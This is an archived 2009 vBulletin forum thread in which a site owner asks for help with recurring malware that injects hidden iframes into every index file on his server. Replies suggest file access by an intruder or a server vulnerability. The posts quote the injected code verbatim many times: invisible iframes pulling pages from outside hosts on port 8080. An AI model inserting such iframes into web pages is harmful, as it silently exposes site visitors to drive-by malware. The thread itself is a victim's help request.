vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   my forum is inficted with unknow virus (https://vborg.vbsupport.ru/showthread.php?t=219503)

ezak 07-26-2009 01:57 PM
my forum is inficted with unknow virus
 
from month I face problem
that all my index* contan this code

PHP Code:
<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe
its infect ./forum/index.php, /index.html (redirect to forum/index.php), /admincp/index.php. modcp/index.php ... and anyfile with index name will be infected


and its stop my forum
I removed alt of other scripts on that site, and scan for virus, and installed modsecuirty with most rules

and its happened again , and don't know why this problem, dose anyone know anything about this virus ?

Marco van Herwaarden 07-27-2009 08:55 AM
What kind of server are you on? A shared server?

Most likely someone has access to your files and is editing them.

ezak 07-27-2009 09:26 AM
I'm on VPS and all my site is mine
and the other site is not have this problem
only this one
, and that happened suddenly, change all index file with that code
its have some sites like
Code:
http://q1e.ru:8080
and other similar to, don't know what is it

its happened weekly or all 5 days

Marco van Herwaarden 07-27-2009 09:45 AM
Contact your host, most likely someone has access to your files.

ezak 07-28-2009 07:30 AM
its give me crazy
some info form
grep -R iframe *
all my styles , and the forum index

PHP Code:
vb/ubetube/misc/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/misc/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/ranks/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/ranks/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/avatars/thumbs/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/avatars/thumbs/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/avatars/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/avatars/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/attach/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/attach/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/gradients/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/gradients/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/smilies/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/smilies/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/buttons/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/buttons/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/icons/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/icons/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/polls/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/polls/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/statusicon/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/statusicon/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/regimage/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/backgrounds/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/regimage/backgrounds/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/fonts/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/regimage/fonts/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/editor/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/editor/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/reputation/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/reputation/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/rating/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/rating/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe
every day now , all index is contain this code

flapjack 07-28-2009 08:38 AM
Your webserver has a vulnerability of some sort.

Probably to do with an old version of cPanel or something like that.

Marco van Herwaarden 07-30-2009 10:44 AM
See post #4.

ezak 07-30-2009 11:35 AM
I'm already manage this host
that is my own VPS, and I already have control to the Node server
and I don't know what to do
I have already secure my server
with CSF hard config, and install Mod_Security with most common rules

--------------- Added [DATE]1248957645[/DATE] at [TIME]1248957645[/TIME] ---------------

I found this maybe related with my isuss

http://blog.unmaskparasites.com/2009...k-php-exploit/


All times are GMT. The time now is 04:39 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01195 seconds
  • Memory Usage 1,802KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (2)bbcode_php_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (8)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete